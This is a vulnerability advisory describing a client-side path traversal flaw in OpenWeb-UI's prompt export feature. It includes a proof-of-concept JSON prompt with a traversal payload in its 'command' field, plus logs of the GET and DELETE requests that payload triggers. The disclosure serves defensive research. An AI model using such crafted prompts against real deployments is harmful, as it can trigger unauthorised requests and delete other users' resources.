Summary A vulnerability has been identified in OpenWeb-UI’s prompt export feature that allows attackers to craft malicious prompts containing specially crafted path references. When these malicious prompts are interacted with (e.g., clicked, deleted), the client-side application makes GET or DELETE requests to attacker-defined paths. This can lead to unauthorized requests to arbitrary endpoints, potentially resulting in information disclosure, exploitation of other services, or unwanted server-side actions. Affected Component(s) OpenWeb-UI Prompt Export Functionality: Versions or instances with the export feature where prompts can contain unvalidated endpoints or special path references. Vulnerability Details Client-Side Path Traversal (CSPT) The vulnerability arises from the way prompts are exported and rendered to the user. If a prompt includes payloads referencing "/..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\ENDPOINT_DEFINED_BY_BAD_GUY", the application’s UI may interpret these paths as legitimate URLs. Unauthorized DELETE Requests Attempting to delete the malicious prompt can trigger a DELETE request to an arbitrary endpoint (e.g., "/ENDPOINT_DEFINED_BY_BAD_GUY/delete"). An attacker could craft a prompt that, when deleted, issues a DELETE request to sensitive system endpoints, potentially removing resources the attacker is not authorized to delete. Proof of Concept - 'command' parameter (PoC) --- [{"command":"/..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\ENDPOINT_DEFINED_BY_BAD_GUY","user_id":"22ac3651-d60f-437d-92e8-e538a6e308df","title":"Test","content":"Test","timestamp":1743320252,"access_control":null,"user":{"id":"22ac3651-d60f-437d-92e8-e538a6e308df","name":"admin","email":"admin@localhost","role":"admin","profile_image_url":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAGQAAABkCAYAAABw4pVUAAAAAXNSR0IArs4c6QAABUdJREFUeF7tnFtsFFUcxr+Zve9sGigUo4ESL2AVBBKq4gVDoqLhAURBtK2mRBNDfNBo9MFEHtCYmPggJjyYeCvFotUKD96NIgoYhahIQmnLJSoVUNSKO7vd3dkdM33Y7rFtaHam02+S/7x1duecb36/ftszM221f1+ptSEbDQFNhNC4GAoiQrh8iBAyHyJEhLARIMsjP0NECBkBsjjSEBFCRoAsjjREhJARIIsjDREhZATI4khDRAgZAbI40hARQkaALI40RISQESCLIw0RIWQEyOJIQ0QIGQGyONIQEUJGgCyONESEkBEgiyMNESFkBMjiSENECBkBsjjSEBHiIYFQDKG6RmVA20qjdPagh5P4O1SgGxJtfBrRhY+OIGZumwM795e/JD2aLdBCjKZuaIkZI1AUDm1B7ruNHiHyd5jACtFr5yG5+qtRadnZP2B2NPhL0qPZAiskfks7wrNXjIkh03U9SgM9HmHyb5jACkm1/gaEYmOSso7vwOCuB/0j6dFMgRQSvnQN4steVhFYWSCcKO+zrQzMtlkeYfJvmEAKSa7eDb12/jB8sx/Wr58h0tCqkMt+cjeKJz/3j6YHMwVOiBatgXHfcecvusunn//+eVh9byG57gcFSfH0XmQ/WOkBJv+GCJyQ6NUbEV3wSAUhG+bW2bALJox7D0NLXjD8WslC+o2LALvoH1GXMwVOiNHUAy0xvXzapT8PIbNz2dDXsWufRWT+BgVJ7psnUTj8qktM/h0eKCH6tAVI3rFLoTO4ewOso51D+7REHYymI8rrpYFeZLqu84+oy5kCJSR+65sI199e8ZGUR/r1CxUExrofoaUqV1c2zG2Xwc4NuETlz+GBEpJafwrQo2UyzgrKWUlVbtHFTyG66HFlX/6nzcjv3+QPUZezBEZIeM49iN+0RTnd7PsrUDzzrbJPi02B0XJM2Wdnf4fZcYVLVP4cHhghyTu/hj71yjIVO/8PzPZLRqWUXLsfeo36WqZrCUoDff5QdTFLIIRosVoYLb3KtUehpx25PSNvvTssnFvyzq35ys069i4Gv3zIBSp/Dg2EkNg1mxC56mGFiHN73c6cHpWSFkogtnSz+rEVkFspgRBiNPdCi09z/S2a/XgNiv3qstn1oB4PQC9En74IyVXe3I8qntqD7IerPEbo7XD0QuLLtyM8a7k3Zx2AWyncQjQdqdZ+5drDzp6F9ctH4xIUmtEIfaq63M3tfQyFI23jOn4y3kQtJDK3GbGlL6k/zPc9gUL3a+NipU+5HMm79invLf3djcx7N47r+Ml4E7UQB6YDtbxV8ZFjtPTBWTYPb/bQ9YudPzcZvM87J60QZ1VlNDvPxIefe1TzfMNZ/kbmtigg8gdfRP7AM+eFMxlvoBUSW/IcIvPUC7lqngDqNRcjufaAek2SOQNz+/BV/2SAH2tOWiEjPmqsLNJtM6ti9/9nKM4gmXcaUTp3oqrxJvIgSiGhusVIrPxUOW/rxE4MfvFAVSxiN7yASMN6dbyjnXCepbBtlEISt3UiNPNmhZWb37PSU/Ujnrc7j3zNrfVsPjj/s7Vx/8/QIqkyLOfaw+yoWG1VgXG0Xzs1314IO32yitEm7hDKhkzc6fKPLELIHIkQEUJGgCyONESEkBEgiyMNESFkBMjiSENECBkBsjjSEBFCRoAsjjREhJARIIsjDREhZATI4khDRAgZAbI40hARQkaALI40RISQESCLIw0RIWQEyOJIQ0QIGQGyONIQEUJGgCyONESEkBEgiyMNESFkBMjiSENECBkBsjjSEBFCRoAsjjSETMh/FHs5A+2/FucAAAAASUVORK5CYII="}}] --- When the user clicks on the prompt: This triggers a GET request due to CSPT: INFO: 127.0.0.1:63151 - "GET /ENDPOINT_DEFINED_BY_BAD_GUY HTTP/1.1" 200 OK When the user tries to delete the prompt: A DELETE request is triggered, targeting an arbitrary endpoint: INFO: 127.0.0.1:63221 - "DELETE /ENDPOINT_DEFINED_BY_BAD_GUY/delete HTTP/1.1" 405 Method Not user may create evil prompt to manipulate DELETE request and remove other element as intended. Update: Security reported to authors for version 0.5.4 and still not accepted to be fixed. Author: Maksymilian Arciemowicz from CXSECURITY